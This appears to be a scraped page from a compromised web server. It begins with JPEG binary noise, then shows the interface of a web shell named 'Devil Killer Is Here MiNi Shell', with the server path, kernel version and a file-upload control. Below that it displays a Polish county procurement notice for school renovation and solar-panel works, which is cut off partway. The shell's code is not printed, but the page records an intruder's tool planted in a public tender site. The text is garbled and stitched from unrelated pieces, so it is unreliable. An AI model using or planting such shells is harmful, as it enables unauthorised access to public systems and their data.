JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/0010890101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „ROBOTY REMONTOWO-BUDOWLANE I ELEKTRYCZNE WRAZ Z ZAKUPEM I MONTAŻEM PANELI FOTOWOLTAICZNYCH W RAMACH REALIZACJI ZADANIA TECHNOLOGICZNA TRANSFORMACJA EDUKACJI W POWIECIE KOLSKIM” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kolski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311620839</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza 21/23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">63/ 26 17 809</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@starostwokolskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starostwokolskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ROBOTY REMONTOWO-BUDOWLANE I ELEKTRYCZNE WRAZ Z ZAKUPEM I MONTAŻEM PANELI FOTOWOLTAICZNYCH W RAMACH REALIZACJI ZADANIA TECHNOLOGICZNA TRANSFORMACJA EDUKACJI W POWIECIE KOLSKIM” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9bb15613-567e-4e2f-8710-bc2015d456e0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00108901</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00004607/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Roboty remontowo-budowlane i elektryczne wraz z zakupem i montażem paneli fotowoltaicznych w ramach realizacji zadania Technologiczna transformacja edukacji w Powiecie Kolskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 7. Zadanie współfinansowane w ramach Programu Regionalnego Fundusze Europejskie dla Wielkopolski 2021-2027, Priorytet 10: Sprawiedliwa transformacja Wielkopolski Wschodniej, Działanie 10.7 Infrastruktura na rzecz aktywnego społeczeństwa, edukacyjna oraz rewitalizacja wspierające transformację gospodarki. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://starostwokolskie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://starostwokolskie.ezamawiajacy.pl oraz poczta elektroniczna zp@starostwokolskie.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	wszelkie oświadczenia, wnioski, zawiadomienia oraz inne informacje Zamawiający <br/>i Wykonawcy przekazują faksem, drogą elektroniczną (poczta elektroniczna) lub poprzez Platformę Zakupową,<br/>2)	oświadczenia, wnioski, zawiadomienia inne informacje oraz pytania kierowane do Zamawiającego przekazywane za pomocą Platformy zakupowej należy kierować na adres Platformy zakupowej Zamawiającego podany w pierwszym punkcie SWZ, <br/>3)	oświadczenia, wnioski, zawiadomienia i inne informacje oraz pytania do Zamawiającego przekazywane za pomocą poczty elektronicznej należy kierować na adres poczty elektronicznej Zamawiającego podany na stronie tytułowej SWZ,<br/>4)	każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt otrzymania oświadczeń, wniosków, zawiadomień oraz innych informacji przekazanych za pomocą Platformy zakupowej lub pocztą elektroniczną.<br/>5)	Ofertę oraz dokumenty, które się na nią składają należy opatrzeć kwalifikowanym podpisem elektronicznym bądź podpisem zaufanym lub podpisem osobistym, przez osobę/y upoważnioną/e do reprezentowania wykonawcy.<br/><br/>- podpis zaufany - podpis elektroniczny, którego autentyczność i integralność są zapewniane przy <br/> użyciu pieczęci elektronicznej ministra właściwego do spraw informatyzacji, <br/>- podpis osobisty - zaawansowany podpis elektroniczny w rozumieniu art. 3 pkt 11 rozporządzenia <br/> Parlamentu Europejskiego i Rady (UE) nr 910/2014 z dnia 23 lipca 2014 r. w sprawie identyfikacji <br/> elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym <br/> oraz uchylającego dyrektywę 1999/93/WE, weryfikowany za pomocą certyfikatu podpisu osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">klauzula zawarta w swz rozdział XXXVI</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">klauzula zawarta w swz rozdział XXXVI</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót remontowo-budowalnych wraz z instalacją fotowoltaiczną na budynku ZSRCKU w Kościelcu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Cena - 60 pkt	<br/>2)	Gwarancja - 05 pkt<br/>3)	Termin wykonania - 11 pkt<br/>4)	Dodatkowe doświadczenie osób wskazanych w wykazie osób - 24 pkt<br/><br/>Punkty przyznawane za kryterium „cena zamówienia” będą liczone wg następującego wzoru:<br/><br/>C = (Cn : Cb) x waga<br/><br/>gdzie:<br/>C - ilość punktów przyznana danej ofercie,<br/>Cn – najniższa cena spośród wszystkich ofert,<br/>Cb - cena oferty badanej,<br/>waga – 60<br/><br/>Punkty przyznawane za kryterium „okres gwarancji na materiały i wykonane roboty budowlane” będą liczone następująco:<br/><br/>24 m-ce	0 pkt<br/>36 m-cy	1 pkt<br/>48 m-cy	3 pkt<br/>60 m-cy	5 pkt<br/>Waga – 05 pkt<br/><br/>Punkty przyznawane za kryterium „termin wykonania zamówienia” będą liczone następująco:<br/><br/>Od 24 do 30 czerwca 2025 - 0 pkt<br/>Od 17 do 23 czerwca 2025 - 5 pkt<br/>Do 16 czerwca 2025 - 11 pkt<br/>Waga – 11 pkt<br/><br/>Punkty przyznawane za kryterium „dodatkowe doświadczenie osób wskazanych w wykazie osób” będzie liczony następująco:<br/> <br/>I. Kierownik branży budowlanej	<br/>1. Za wykazanie kierowania nad jedną robotą o wartości minimum 240 tys. zł brutto lub więcej - 4pkt<br/> Za wykazanie kierowania nad dwiema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 8 pkt<br/> Za wykazanie kierowania nad trzema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 12 pkt<br/>2. Za wykazanie kierowania nad jedną robotą o minimalnej wymaganej wartości 150 tys. zł brutto<br/> - 2 pkt<br/> Za wykazanie kierowania nad dwiema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda - 6 pkt<br/> Za wykazanie kierowania nad trzema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda - 8 pkt<br/><br/>II. Kierownik branży elektrycznej	<br/>1.	Za wykazanie kierowania nad jedną robotą o wartości minimum 240 tys. zł brutto lub więcej <br/> - 4 pkt<br/> Za wykazanie kierowania nad dwiema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 8 pkt<br/> Za wykazanie kierowania nad trzema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 12 pkt<br/>2. Za wykazanie kierowania nad jedną robotą o minimalnej wymaganej wartości 150 tys. zł brutto<br/> - 2 pkt<br/> Za wykazanie kierowania nad dwiema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda - 6 pkt<br/> Za wykazanie kierowania nad trzema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda - 8 pkt<br/>Waga – 24 pkt<br/><br/><br/>Sumując punkty uzyskane w kryterium cena, kryterium termin wykonania zamówienia, kryterium dodatkowe doświadczenie osób wskazanych w wykazie i gwarancja na materiały i roboty budowlane, otrzymujemy punkty uzyskane przez daną ofertą (S) = C + T + D + G<br/>Oferta, która otrzyma największą ilość punktów zostanie uznana za najkorzystniejszą <br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Zamawiający odrzuci oferty, wykluczy z postępowania Wykonawców lub unieważni postępowanie na zasadach przewidzianych dla tych czynności w ustawie Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">11</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe doświadczenie osób wskazanych w wykazie osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót remontowo-budowalnych wraz z instalacją fotowoltaiczną na budynku ZSOiT w Kłodawie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Cena - 60 pkt	<br/>2)	Gwarancja - 05 pkt<br/>3)	Termin wykonania - 11 pkt<br/>4)	Dodatkowe doświadczenie osób wskazanych w wykazie osób - 24 pkt<br/><br/>Punkty przyznawane za kryterium „cena zamówienia” będą liczone wg następującego wzoru:<br/><br/>C = (Cn : Cb) x waga<br/><br/>gdzie:<br/>C - ilość punktów przyznana danej ofercie,<br/>Cn – najniższa cena spośród wszystkich ofert,<br/>Cb - cena oferty badanej,<br/>waga – 60<br/><br/>Punkty przyznawane za kryterium „okres gwarancji na materiały i wykonane roboty budowlane” będą liczone następująco:<br/><br/>24 m-ce	- 0 pkt<br/>36 m-cy	- 1 pkt<br/>48 m-cy	- 3 pkt<br/>60 m-cy	- 5 pkt<br/>Waga – 05 pkt<br/><br/>Punkty przyznawane za kryterium „termin wykonania zamówienia” będą liczone następująco:<br/><br/>Od 24 do 30 czerwca 2025 - 0 pkt<br/>Od 17 do 23 czerwca 2025 - 5 pkt<br/>Do 16 czerwca 2025 -11 pkt<br/>Waga – 11 pkt<br/><br/>Punkty przyznawane za kryterium „dodatkowe doświadczenie osób wskazanych w wykazie osób” będzie liczony następująco:<br/> <br/>I. Kierownik branży budowlanej<br/> 1.	Za wykazanie kierowania nad jedną robotą o wartości minimum 240 tys. zł brutto lub więcej <br/> - 4 pkt<br/> Za wykazanie kierowania nad dwiema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 8 pkt<br/> Za wykazanie kierowania nad trzema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 12 pkt<br/>2. Za wykazanie kierowania nad jedną robotą o minimalnej wymaganej wartości 150 tys. zł brutto<br/> - 2 pkt<br/> Za wykazanie kierowania nad dwiema robotami o minimalnej wymaganej wartości 150 tys. zł <br/> brutto każda - 6 pkt<br/> Za wykazanie kierowania nad trzema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda -	8 pkt<br/><br/>II. Kierownik branży elektrycznej	<br/> 1. Za wykazanie kierowania nad jedną robotą o wartości minimum 240 tys. zł brutto lub więcej <br/> - 4 pkt<br/> Za wykazanie kierowania nad dwiema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 8 pkt<br/> Za wykazanie kierowania nad trzema robotami o wartości minimum 240 tys. zł brutto każda lub <br/> więcej - 12 pkt<br/> 2. Za wykazanie kierowania nad jedną robotą o minimalnej wymaganej wartości 150 tys. zł brutto<br/> - 2 pkt<br/> Za wykazanie kierowania nad dwiema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda - 6 pkt<br/> Za wykazanie kierowania nad trzema robotami o minimalnej wymaganej wartości 150 tys. zł brutto <br/> każda - 8 pkt<br/>Waga – 24 pkt<br/><br/>Sumując punkty uzyskane w kryterium cena, kryterium termin wykonania zamówienia, kryterium dodatkowe doświadczenie osób wskazanych w wykazie i gwarancja na materiały i roboty budowlane, otrzymujemy punkty uzyskane przez daną ofertą (S) = C + T + D + G<br/>Oferta, która otrzyma największą ilość punktów zostanie uznana za najkorzystniejszą <br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Zamawiający odrzuci oferty, wykluczy z postępowania Wykonawców lub unieważni postępowanie na zasadach przewidzianych dla tych czynności w ustawie Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">11</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe doświadczenie osób wskazanych w wykazie osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót remontowo-budowalnych w budynku ZSE-A w Kole. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Cena -	60 pkt	<br/>2)	